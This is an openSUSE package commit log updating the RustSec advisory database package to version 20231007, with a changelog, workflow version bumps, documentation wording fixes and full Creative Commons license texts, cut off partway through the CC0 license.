Script 'mail_helper' called by obssrc
Hello community,
here is the log from the commit of package cargo-audit-advisory-db for
openSUSE:Factory checked in at 2023-10-08 12:18:26
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Comparing /work/SRC/openSUSE:Factory/cargo-audit-advisory-db (Old)
and /work/SRC/openSUSE:Factory/.cargo-audit-advisory-db.new.28202 (New)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Package is "cargo-audit-advisory-db"
Sun Oct 8 12:18:26 2023 rev:36 rq:1116152 version:20231007
Changes:
--------
---
/work/SRC/openSUSE:Factory/cargo-audit-advisory-db/cargo-audit-advisory-db.changes
2023-08-18 19:29:25.199430049 +0200
+++
/work/SRC/openSUSE:Factory/.cargo-audit-advisory-db.new.28202/cargo-audit-advisory-db.changes
2023-10-08 12:21:50.113743998 +0200
@@ -1,0 +2,15 @@
+Sat Oct 07 01:19:51 UTC 2023 - william.br...@suse.com
+
+- Update to version 20231007:
+ * Assigned RUSTSEC-2023-0066 to pleaser (#1799)
+ * Document the privilege-escalation vulnerability in pleaser. (#1798)
+ * Update webpki RUSTSEC-2023-0052 advisory. (#1797)
+ * Assigned RUSTSEC-2023-0065 to tungstenite (#1796)
+ * Create advisory for tungstenite DoS (#1795)
+ * Add patch version (#1794)
+ * Update info about CVE-2023-5129 (#1793)
+ * Bump rustsec-admin to 0.8.8 (#1791)
+ * Assigned RUSTSEC-2023-0064 to gix-transport (#1790)
+ * Add notice to gix-transport crate (#1789)
+
+-------------------------------------------------------------------
Old:
----
advisory-db-20230818.tar.xz
New:
----
advisory-db-20231007.tar.xz
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Other differences:
------------------
++++++ cargo-audit-advisory-db.spec ++++++
--- /var/tmp/diff_new_pack.gv6pdT/_old 2023-10-08 12:21:51.137780816 +0200
+++ /var/tmp/diff_new_pack.gv6pdT/_new 2023-10-08 12:21:51.137780816 +0200
@@ -17,7 +17,7 @@
Name: cargo-audit-advisory-db
-Version: 20230818
+Version: 20231007
Release: 0
Summary: A database of known security issues for Rust depedencies
License: CC0-1.0
++++++ _service ++++++
--- /var/tmp/diff_new_pack.gv6pdT/_old 2023-10-08 12:21:51.161781679 +0200
+++ /var/tmp/diff_new_pack.gv6pdT/_new 2023-10-08 12:21:51.165781823 +0200
@@ -2,7 +2,7 @@
<service mode="disabled" name="obs_scm">
<param name="url">https://github.com/RustSec/advisory-db.git</param>
<param name="scm">git</param>
- <param name="version">20230818</param>
+ <param name="version">20231007</param>
<param name="revision">main</param>
<param name="changesgenerate">enable</param>
<param name="changesauthor">william.br...@suse.com</param>
++++++ advisory-db-20230818.tar.xz -> advisory-db-20231007.tar.xz ++++++
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/.duplicate-id-guard
new/advisory-db-20231007/.duplicate-id-guard
--- old/advisory-db-20230818/.duplicate-id-guard 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.duplicate-id-guard 2023-10-03
15:53:18.000000000 +0200
@@ -1,3 +1,3 @@
This file causes merge conflicts if two ID assignment jobs run concurrently.
This prevents duplicate ID assignment due to a race between those jobs.
-e315acbba1dcf156464306c5a2fae64532f7b99cfbf4935bf3b894f2174c7de2 -
+36a9b51a48b3404a0625daab077982cb323512602246febf46ad480eee672625 -
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/.github/workflows/assign-ids.yml
new/advisory-db-20231007/.github/workflows/assign-ids.yml
--- old/advisory-db-20230818/.github/workflows/assign-ids.yml 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.github/workflows/assign-ids.yml 2023-10-03
15:53:18.000000000 +0200
@@ -9,17 +9,17 @@
name: Assign IDs
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v3
+ - uses: actions/checkout@v4
- name: Cache cargo bin
uses: actions/cache@v3
with:
path: ~/.cargo/bin
- key: rustsec-admin-v0.8.6
+ key: rustsec-admin-v0.8.8
- name: Install rustsec-admin
run: |
- VERSION="0.8.6"
+ VERSION="0.8.8"
if ! ( rustsec-admin --version | grep -q "$VERSION" ); then
cargo install rustsec-admin --force --vers "$VERSION"
fi
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/.github/workflows/export-osv.yml
new/advisory-db-20231007/.github/workflows/export-osv.yml
--- old/advisory-db-20230818/.github/workflows/export-osv.yml 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.github/workflows/export-osv.yml 2023-10-03
15:53:18.000000000 +0200
@@ -8,15 +8,15 @@
publish-web:
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v3
+ - uses: actions/checkout@v4
with:
ref: osv
- uses: actions/cache@v3
with:
path: ~/.cargo/bin
- key: rustsec-admin-v0.8.6
+ key: rustsec-admin-v0.8.8
- run: |
- VERSION="0.8.6"
+ VERSION="0.8.8"
if ! ( rustsec-admin --version | grep -q "$VERSION" ); then
cargo install rustsec-admin --force --vers "$VERSION"
fi
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore'
old/advisory-db-20230818/.github/workflows/publish-web.yml
new/advisory-db-20231007/.github/workflows/publish-web.yml
--- old/advisory-db-20230818/.github/workflows/publish-web.yml 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.github/workflows/publish-web.yml 2023-10-03
15:53:18.000000000 +0200
@@ -8,15 +8,15 @@
publish-web:
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v3
+ - uses: actions/checkout@v4
with:
ref: gh-pages
- uses: actions/cache@v3
with:
path: ~/.cargo/bin
- key: rustsec-admin-v0.8.6
+ key: rustsec-admin-v0.8.8
- run: |
- VERSION="0.8.6"
+ VERSION="0.8.8"
if ! ( rustsec-admin --version | grep -q "$VERSION" ); then
cargo install rustsec-admin --force --vers "$VERSION"
fi
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/.github/workflows/validate.yml
new/advisory-db-20231007/.github/workflows/validate.yml
--- old/advisory-db-20230818/.github/workflows/validate.yml 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.github/workflows/validate.yml 2023-10-03
15:53:18.000000000 +0200
@@ -10,17 +10,17 @@
name: Lint advisories
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v3
+ - uses: actions/checkout@v4
- name: Cache cargo bin
uses: actions/cache@v3
with:
path: ~/.cargo/bin
- key: rustsec-admin-v0.8.6
+ key: rustsec-admin-v0.8.8
- name: Install rustsec-admin
run: |
- VERSION="0.8.6"
+ VERSION="0.8.8"
if ! ( rustsec-admin --version | grep -q "$VERSION" ); then
cargo install rustsec-admin --force --vers "$VERSION"
fi
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/CONTRIBUTING.md
new/advisory-db-20231007/CONTRIBUTING.md
--- old/advisory-db-20230818/CONTRIBUTING.md 2023-08-14 19:14:25.000000000
+0200
+++ new/advisory-db-20231007/CONTRIBUTING.md 2023-10-03 15:53:18.000000000
+0200
@@ -52,13 +52,13 @@
**Q: Do I need to be owner of a crate to file an advisory?**
-A: No, anyone can file an advisory against any crate. The legitimacy of
+A: No, anyone can file an advisory against any crate. The legitimacy of
vulnerabilities will be determined prior to merging. If a vulnerability
- turns out to be fake it will be removed from the database.
+ turns out to be fake, it will be removed from the database.
**Q: Can I file an advisory without creating a pull request?**
-A: Yes, instead of creating a full advisory yourself you can also
+A: Yes, instead of creating a full advisory yourself, you can also
[open an issue on the advisory-db
repo](https://github.com/RustSec/advisory-db/issues)
or email information about the vulnerability to
[rust...@googlegroups.com](mailto:rust...@googlegroups.com).
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/EXAMPLE_ADVISORY.md
new/advisory-db-20231007/EXAMPLE_ADVISORY.md
--- old/advisory-db-20230818/EXAMPLE_ADVISORY.md 2023-08-14
19:14:25.000000000 +0200
+++ new/advisory-db-20231007/EXAMPLE_ADVISORY.md 2023-10-03
15:53:18.000000000 +0200
@@ -26,7 +26,7 @@
This is an example template for a RustSec advisory. Please copy this to
`crates/<crate-name>` and rename it to `RUSTSEC-0000-0000.md`.
-In this section of the advisory you can write an extended description
+In this section of the advisory, you can write an extended description
of the vulnerability, will be converted into HTML and rendered at
<https://rustsec.org>.
@@ -34,10 +34,10 @@
- TOML "front matter". See `README.md` for schema.
- Please include as much detail as you'd like.
-A well structured advisory will include information like:
+A well-structured advisory will include information like:
Affected versions of this crate did not properly check for integer overflow
when allocating a buffer in `MyBuffer::with_capacity()` (bug
description/location/root cause).
-This can result in a memory corruption (consequence of the bug) when large
integer is given to the parameter (trigger condition).
+This can result in a memory corruption (consequence of the bug) when a large
integer is given to the parameter (trigger condition).
The flaw was corrected in commit abc123 by using `saturating_mul()` when
calculating the buffer size (fix description).
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/LICENSE.txt
new/advisory-db-20231007/LICENSE.txt
--- old/advisory-db-20230818/LICENSE.txt 2023-08-14 19:14:25.000000000
+0200
+++ new/advisory-db-20231007/LICENSE.txt 2023-10-03 15:53:18.000000000
+0200
@@ -1,7 +1,7 @@
-All code and data in the RustSec advisory database repository is dedicated to
-the public domain:
-
-https://creativecommons.org/publicdomain/zero/1.0/
+All code and data in the RustSec advisory database repository are dedicated to
+the public domain (except otherwise specified, see exception below), and are
+available under Creative Commons Zero 1.O Universal license (see
+LICENSES/CC0-1.0.txt for terms).
By committing to this repository, you hereby waive all rights to the work
worldwide under copyright law, including all related and neighboring rights, to
@@ -10,10 +10,20 @@
You can copy, modify, distribute, and retransmit any information in this
repository, even for commercial purposes, without asking permission.
-Additional content from GitHub Security Advisory ("GHSA") database
+----
+
+Exception: Additional content imported from the GitHub Security Advisory
+("GHSA") database.
-Additional content may be adapted from GHSA with attribution requirements, but
-with no additional clauses like copyleft.
+Additional content is adapted from GitHub Security Advisory, and is available
+under Creative Commons Attribution 4.0 International (see
+LICENSES/CC-BY-4.0.txt for terms).
+
+Any such license and attribution will be explicitly covered, respectively in
+the "license" and "url" (pointing to the advisory GHSA identifier prefixed by
+https://github.com/advisories) metadata fields, directly within the applicable
+advisories. As stated in the terms linked below, this fulfills the attribution
+requirement.
-Any such license and attribution will be explicitly covered on an advisory by
-advisory basis directly within the applicable advisories.
+https://docs.github.com/en/site-policy/github-terms/github-terms-for-additional-
+products-and-features#advisory-database
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/LICENSES/CC-BY-4.0.txt
new/advisory-db-20231007/LICENSES/CC-BY-4.0.txt
--- old/advisory-db-20230818/LICENSES/CC-BY-4.0.txt 1970-01-01
01:00:00.000000000 +0100
+++ new/advisory-db-20231007/LICENSES/CC-BY-4.0.txt 2023-10-03
15:53:18.000000000 +0200
@@ -0,0 +1,428 @@
+Attribution-ShareAlike 4.0 International
+
+=======================================================================
+
+Creative Commons Corporation ("Creative Commons") is not a law firm and
+does not provide legal services or legal advice. Distribution of
+Creative Commons public licenses does not create a lawyer-client or
+other relationship. Creative Commons makes its licenses and related
+information available on an "as-is" basis. Creative Commons gives no
+warranties regarding its licenses, any material licensed under their
+terms and conditions, or any related information. Creative Commons
+disclaims all liability for damages resulting from their use to the
+fullest extent possible.
+
+Using Creative Commons Public Licenses
+
+Creative Commons public licenses provide a standard set of terms and
+conditions that creators and other rights holders may use to share
+original works of authorship and other material subject to copyright
+and certain other rights specified in the public license below. The
+following considerations are for informational purposes only, are not
+exhaustive, and do not form part of our licenses.
+
+ Considerations for licensors: Our public licenses are
+ intended for use by those authorized to give the public
+ permission to use material in ways otherwise restricted by
+ copyright and certain other rights. Our licenses are
+ irrevocable. Licensors should read and understand the terms
+ and conditions of the license they choose before applying it.
+ Licensors should also secure all rights necessary before
+ applying our licenses so that the public can reuse the
+ material as expected. Licensors should clearly mark any
+ material not subject to the license. This includes other CC-
+ licensed material, or material used under an exception or
+ limitation to copyright. More considerations for licensors:
+ wiki.creativecommons.org/Considerations_for_licensors
+
+ Considerations for the public: By using one of our public
+ licenses, a licensor grants the public permission to use the
+ licensed material under specified terms and conditions. If
+ the licensor's permission is not necessary for any reason--for
+ example, because of any applicable exception or limitation to
+ copyright--then that use is not regulated by the license. Our
+ licenses grant only permissions under copyright and certain
+ other rights that a licensor has authority to grant. Use of
+ the licensed material may still be restricted for other
+ reasons, including because others have copyright or other
+ rights in the material. A licensor may make special requests,
+ such as asking that all changes be marked or described.
+ Although not required by our licenses, you are encouraged to
+ respect those requests where reasonable. More considerations
+ for the public:
+ wiki.creativecommons.org/Considerations_for_licensees
+
+=======================================================================
+
+Creative Commons Attribution-ShareAlike 4.0 International Public
+License
+
+By exercising the Licensed Rights (defined below), You accept and agree
+to be bound by the terms and conditions of this Creative Commons
+Attribution-ShareAlike 4.0 International Public License ("Public
+License"). To the extent this Public License may be interpreted as a
+contract, You are granted the Licensed Rights in consideration of Your
+acceptance of these terms and conditions, and the Licensor grants You
+such rights in consideration of benefits the Licensor receives from
+making the Licensed Material available under these terms and
+conditions.
+
+
+Section 1 -- Definitions.
+
+ a. Adapted Material means material subject to Copyright and Similar
+ Rights that is derived from or based upon the Licensed Material
+ and in which the Licensed Material is translated, altered,
+ arranged, transformed, or otherwise modified in a manner requiring
+ permission under the Copyright and Similar Rights held by the
+ Licensor. For purposes of this Public License, where the Licensed
+ Material is a musical work, performance, or sound recording,
+ Adapted Material is always produced where the Licensed Material is
+ synched in timed relation with a moving image.
+
+ b. Adapter's License means the license You apply to Your Copyright
+ and Similar Rights in Your contributions to Adapted Material in
+ accordance with the terms and conditions of this Public License.
+
+ c. BY-SA Compatible License means a license listed at
+ creativecommons.org/compatiblelicenses, approved by Creative
+ Commons as essentially the equivalent of this Public License.
+
+ d. Copyright and Similar Rights means copyright and/or similar rights
+ closely related to copyright including, without limitation,
+ performance, broadcast, sound recording, and Sui Generis Database
+ Rights, without regard to how the rights are labeled or
+ categorized. For purposes of this Public License, the rights
+ specified in Section 2(b)(1)-(2) are not Copyright and Similar
+ Rights.
+
+ e. Effective Technological Measures means those measures that, in the
+ absence of proper authority, may not be circumvented under laws
+ fulfilling obligations under Article 11 of the WIPO Copyright
+ Treaty adopted on December 20, 1996, and/or similar international
+ agreements.
+
+ f. Exceptions and Limitations means fair use, fair dealing, and/or
+ any other exception or limitation to Copyright and Similar Rights
+ that applies to Your use of the Licensed Material.
+
+ g. License Elements means the license attributes listed in the name
+ of a Creative Commons Public License. The License Elements of this
+ Public License are Attribution and ShareAlike.
+
+ h. Licensed Material means the artistic or literary work, database,
+ or other material to which the Licensor applied this Public
+ License.
+
+ i. Licensed Rights means the rights granted to You subject to the
+ terms and conditions of this Public License, which are limited to
+ all Copyright and Similar Rights that apply to Your use of the
+ Licensed Material and that the Licensor has authority to license.
+
+ j. Licensor means the individual(s) or entity(ies) granting rights
+ under this Public License.
+
+ k. Share means to provide material to the public by any means or
+ process that requires permission under the Licensed Rights, such
+ as reproduction, public display, public performance, distribution,
+ dissemination, communication, or importation, and to make material
+ available to the public including in ways that members of the
+ public may access the material from a place and at a time
+ individually chosen by them.
+
+ l. Sui Generis Database Rights means rights other than copyright
+ resulting from Directive 96/9/EC of the European Parliament and of
+ the Council of 11 March 1996 on the legal protection of databases,
+ as amended and/or succeeded, as well as other essentially
+ equivalent rights anywhere in the world.
+
+ m. You means the individual or entity exercising the Licensed Rights
+ under this Public License. Your has a corresponding meaning.
+
+
+Section 2 -- Scope.
+
+ a. License grant.
+
+ 1. Subject to the terms and conditions of this Public License,
+ the Licensor hereby grants You a worldwide, royalty-free,
+ non-sublicensable, non-exclusive, irrevocable license to
+ exercise the Licensed Rights in the Licensed Material to:
+
+ a. reproduce and Share the Licensed Material, in whole or
+ in part; and
+
+ b. produce, reproduce, and Share Adapted Material.
+
+ 2. Exceptions and Limitations. For the avoidance of doubt, where
+ Exceptions and Limitations apply to Your use, this Public
+ License does not apply, and You do not need to comply with
+ its terms and conditions.
+
+ 3. Term. The term of this Public License is specified in Section
+ 6(a).
+
+ 4. Media and formats; technical modifications allowed. The
+ Licensor authorizes You to exercise the Licensed Rights in
+ all media and formats whether now known or hereafter created,
+ and to make technical modifications necessary to do so. The
+ Licensor waives and/or agrees not to assert any right or
+ authority to forbid You from making technical modifications
+ necessary to exercise the Licensed Rights, including
+ technical modifications necessary to circumvent Effective
+ Technological Measures. For purposes of this Public License,
+ simply making modifications authorized by this Section 2(a)
+ (4) never produces Adapted Material.
+
+ 5. Downstream recipients.
+
+ a. Offer from the Licensor -- Licensed Material. Every
+ recipient of the Licensed Material automatically
+ receives an offer from the Licensor to exercise the
+ Licensed Rights under the terms and conditions of this
+ Public License.
+
+ b. Additional offer from the Licensor -- Adapted Material.
+ Every recipient of Adapted Material from You
+ automatically receives an offer from the Licensor to
+ exercise the Licensed Rights in the Adapted Material
+ under the conditions of the Adapter's License You apply.
+
+ c. No downstream restrictions. You may not offer or impose
+ any additional or different terms or conditions on, or
+ apply any Effective Technological Measures to, the
+ Licensed Material if doing so restricts exercise of the
+ Licensed Rights by any recipient of the Licensed
+ Material.
+
+ 6. No endorsement. Nothing in this Public License constitutes or
+ may be construed as permission to assert or imply that You
+ are, or that Your use of the Licensed Material is, connected
+ with, or sponsored, endorsed, or granted official status by,
+ the Licensor or others designated to receive attribution as
+ provided in Section 3(a)(1)(A)(i).
+
+ b. Other rights.
+
+ 1. Moral rights, such as the right of integrity, are not
+ licensed under this Public License, nor are publicity,
+ privacy, and/or other similar personality rights; however, to
+ the extent possible, the Licensor waives and/or agrees not to
+ assert any such rights held by the Licensor to the limited
+ extent necessary to allow You to exercise the Licensed
+ Rights, but not otherwise.
+
+ 2. Patent and trademark rights are not licensed under this
+ Public License.
+
+ 3. To the extent possible, the Licensor waives any right to
+ collect royalties from You for the exercise of the Licensed
+ Rights, whether directly or through a collecting society
+ under any voluntary or waivable statutory or compulsory
+ licensing scheme. In all other cases the Licensor expressly
+ reserves any right to collect such royalties.
+
+
+Section 3 -- License Conditions.
+
+Your exercise of the Licensed Rights is expressly made subject to the
+following conditions.
+
+ a. Attribution.
+
+ 1. If You Share the Licensed Material (including in modified
+ form), You must:
+
+ a. retain the following if it is supplied by the Licensor
+ with the Licensed Material:
+
+ i. identification of the creator(s) of the Licensed
+ Material and any others designated to receive
+ attribution, in any reasonable manner requested by
+ the Licensor (including by pseudonym if
+ designated);
+
+ ii. a copyright notice;
+
+ iii. a notice that refers to this Public License;
+
+ iv. a notice that refers to the disclaimer of
+ warranties;
+
+ v. a URI or hyperlink to the Licensed Material to the
+ extent reasonably practicable;
+
+ b. indicate if You modified the Licensed Material and
+ retain an indication of any previous modifications; and
+
+ c. indicate the Licensed Material is licensed under this
+ Public License, and include the text of, or the URI or
+ hyperlink to, this Public License.
+
+ 2. You may satisfy the conditions in Section 3(a)(1) in any
+ reasonable manner based on the medium, means, and context in
+ which You Share the Licensed Material. For example, it may be
+ reasonable to satisfy the conditions by providing a URI or
+ hyperlink to a resource that includes the required
+ information.
+
+ 3. If requested by the Licensor, You must remove any of the
+ information required by Section 3(a)(1)(A) to the extent
+ reasonably practicable.
+
+ b. ShareAlike.
+
+ In addition to the conditions in Section 3(a), if You Share
+ Adapted Material You produce, the following conditions also apply.
+
+ 1. The Adapter's License You apply must be a Creative Commons
+ license with the same License Elements, this version or
+ later, or a BY-SA Compatible License.
+
+ 2. You must include the text of, or the URI or hyperlink to, the
+ Adapter's License You apply. You may satisfy this condition
+ in any reasonable manner based on the medium, means, and
+ context in which You Share Adapted Material.
+
+ 3. You may not offer or impose any additional or different terms
+ or conditions on, or apply any Effective Technological
+ Measures to, Adapted Material that restrict exercise of the
+ rights granted under the Adapter's License You apply.
+
+
+Section 4 -- Sui Generis Database Rights.
+
+Where the Licensed Rights include Sui Generis Database Rights that
+apply to Your use of the Licensed Material:
+
+ a. for the avoidance of doubt, Section 2(a)(1) grants You the right
+ to extract, reuse, reproduce, and Share all or a substantial
+ portion of the contents of the database;
+
+ b. if You include all or a substantial portion of the database
+ contents in a database in which You have Sui Generis Database
+ Rights, then the database in which You have Sui Generis Database
+ Rights (but not its individual contents) is Adapted Material,
+ including for purposes of Section 3(b); and
+
+ c. You must comply with the conditions in Section 3(a) if You Share
+ all or a substantial portion of the contents of the database.
+
+For the avoidance of doubt, this Section 4 supplements and does not
+replace Your obligations under this Public License where the Licensed
+Rights include other Copyright and Similar Rights.
+
+
+Section 5 -- Disclaimer of Warranties and Limitation of Liability.
+
+ a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
+ EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
+ AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
+ ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
+ IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
+ WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
+ PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
+ ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
+ KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
+ ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.
+
+ b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
+ TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
+ NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
+ INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
+ COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
+ USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
+ ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
+ DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
+ IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.
+
+ c. The disclaimer of warranties and limitation of liability provided
+ above shall be interpreted in a manner that, to the extent
+ possible, most closely approximates an absolute disclaimer and
+ waiver of all liability.
+
+
+Section 6 -- Term and Termination.
+
+ a. This Public License applies for the term of the Copyright and
+ Similar Rights licensed here. However, if You fail to comply with
+ this Public License, then Your rights under this Public License
+ terminate automatically.
+
+ b. Where Your right to use the Licensed Material has terminated under
+ Section 6(a), it reinstates:
+
+ 1. automatically as of the date the violation is cured, provided
+ it is cured within 30 days of Your discovery of the
+ violation; or
+
+ 2. upon express reinstatement by the Licensor.
+
+ For the avoidance of doubt, this Section 6(b) does not affect any
+ right the Licensor may have to seek remedies for Your violations
+ of this Public License.
+
+ c. For the avoidance of doubt, the Licensor may also offer the
+ Licensed Material under separate terms or conditions or stop
+ distributing the Licensed Material at any time; however, doing so
+ will not terminate this Public License.
+
+ d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
+ License.
+
+
+Section 7 -- Other Terms and Conditions.
+
+ a. The Licensor shall not be bound by any additional or different
+ terms or conditions communicated by You unless expressly agreed.
+
+ b. Any arrangements, understandings, or agreements regarding the
+ Licensed Material not stated herein are separate from and
+ independent of the terms and conditions of this Public License.
+
+
+Section 8 -- Interpretation.
+
+ a. For the avoidance of doubt, this Public License does not, and
+ shall not be interpreted to, reduce, limit, restrict, or impose
+ conditions on any use of the Licensed Material that could lawfully
+ be made without permission under this Public License.
+
+ b. To the extent possible, if any provision of this Public License is
+ deemed unenforceable, it shall be automatically reformed to the
+ minimum extent necessary to make it enforceable. If the provision
+ cannot be reformed, it shall be severed from this Public License
+ without affecting the enforceability of the remaining terms and
+ conditions.
+
+ c. No term or condition of this Public License will be waived and no
+ failure to comply consented to unless expressly agreed to by the
+ Licensor.
+
+ d. Nothing in this Public License constitutes or may be interpreted
+ as a limitation upon, or waiver of, any privileges and immunities
+ that apply to the Licensor or You, including from the legal
+ processes of any jurisdiction or authority.
+
+
+=======================================================================
+
+Creative Commons is not a party to its public
+licenses. Notwithstanding, Creative Commons may elect to apply one of
+its public licenses to material it publishes and in those instances
+will be considered the âLicensor.â The text of the Creative Commons
+public licenses is dedicated to the public domain under the CC0 Public
+Domain Dedication. Except for the limited purpose of indicating that
+material is shared under a Creative Commons public license or as
+otherwise permitted by the Creative Commons policies published at
+creativecommons.org/policies, Creative Commons does not authorize the
+use of the trademark "Creative Commons" or any other trademark or logo
+of Creative Commons without its prior written consent including,
+without limitation, in connection with any unauthorized modifications
+to any of its public licenses or any other arrangements,
+understandings, or agreements concerning use of licensed material. For
+the avoidance of doubt, this paragraph does not form part of the
+public licenses.
+
+Creative Commons may be contacted at creativecommons.org.
+
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn'
'--exclude=.svnignore' old/advisory-db-20230818/LICENSES/CC0-1.0.txt
new/advisory-db-20231007/LICENSES/CC0-1.0.txt
--- old/advisory-db-20230818/LICENSES/CC0-1.0.txt 1970-01-01
01:00:00.000000000 +0100
+++ new/advisory-db-20231007/LICENSES/CC0-1.0.txt 2023-10-03
15:53:18.000000000 +0200
@@ -0,0 +1,121 @@
+Creative Commons Legal Code
+
+CC0 1.0 Universal
+
+ CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE
+ LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN
+ ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS
+ INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES
+ REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS
+ PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM
+ THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED
+ HEREUNDER.
+
+Statement of Purpose
+
+The laws of most jurisdictions throughout the world automatically confer
+exclusive Copyright and Related Rights (defined below) upon the creator
+and subsequent owner(s) (each and all, an "owner") of an original work of
+authorship and/or a database (each, a "Work").
+
+Certain owners wish to permanently relinquish those rights to a Work for
+the purpose of contributing to a commons of creative, cultural and
+scientific works ("Commons") that the public can reliably and without fear
+of later claims of infringement build upon, modify, incorporate in other
+works, reuse and redistribute as freely as possible in any form whatsoever
+and for any purposes, including without limitation commercial purposes.
+These owners may contribute to the Commons to promote the ideal of a free
+culture and the further production of creative, cultural and scientific
+works, or to gain reputation or greater distribution for their Work in
+part through the use and efforts of others.
+
+For these and/or other purposes and motivations, and without any
+expectation of additional consideration or compensation, the person
+associating CC0 with a Work (the "Affirmer"), to the extent that he or she
+is an owner of Copyright and Related Rights in the Work, voluntarily
+elects to apply CC0 to the Work and publicly distribute the Work under its
+terms, with knowledge of his or her Copyright and Related Rights in the
+Work and the meaning and intended legal effect of CC0 on those rights.
+
+1. Copyright and Related Rights. A Work made available under CC0 may be
+protected by copyright and related or neighboring rights ("Copyright and
+Related Rights"). Copyright and Related Rights include, but are not
+limited to, the following:
+
+ i. the right to reproduce, adapt, distribute, perform, display,
+ communicate, and translate a Work;
+ ii. moral rights retained by the original author(s) and/or performer(s);
+iii. publicity and privacy rights pertaining to a person's image or
+ likeness depicted in a Work;
+ iv. rights protecting against unfair competition in regards to a Work,
+ subject to the limitations in paragraph 4(a), below;
+ v. rights protecting the extraction, dissemination, use and reuse of data
+ in a Work;
+ vi. database rights (such as those arising under Directive 96/9/EC of the
+ European Parliament and of the Council of 11 March 1996 on the legal
+ protection of databases, and under any national implementation
+ thereof, including any amended or successor version of such
+ directive); and
+vii. other similar, equivalent or corresponding rights throughout the
+ world based on applicable law or treaty, and any national
+ implementations thereof.
+
+2. Waiver. To the greatest extent permitted by, but not in contravention
+of, applicable law, Affirmer hereby overtly, fully, permanently,
+irrevocably and unconditionally waives, abandons, and surrenders all of
+Affirmer's Copyright and Related Rights and associated claims and causes
+of action, whether now known or unknown (including existing as well as
+future claims and causes of action), in the Work (i) in all territories
+worldwide, (ii) for the maximum duration provided by applicable law or
+treaty (including future time extensions), (iii) in any current or future
+medium and for any number of copies, and (iv) for any purpose whatsoever,
+including without limitation commercial, advertising or promotional
+purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each
+member of the public at large and to the detriment of Affirmer's heirs and
+successors, fully intending that such Waiver shall not be subject to
+revocation, rescission, cancellation, termination, or any other legal or
+equitable action to disrupt the quiet enjoyment of the Work by the public
+as contemplated by Affirmer's express Statement of Purpose.
+
+3. Public License Fallback. Should any part of the Waiver for any reason
+be judged legally invalid or ineffective under applicable law, then the
+Waiver shall be preserved to the maximum extent permitted taking into
+account Affirmer's express Statement of Purpose. In addition, to the
+extent the Waiver is so judged Affirmer hereby grants to each affected
+person a royalty-free, non transferable, non sublicensable, non exclusive,
+irrevocable and unconditional license to exercise Affirmer's Copyright and
+Related Rights in the Work (i) in all territories worldwide, (ii) for the
+maximum duration provided by applicable law or treaty (including future
+time extensions), (iii) in any current or future medium and for any number
+of copies, and (iv) for any purpose whatsoever, including without
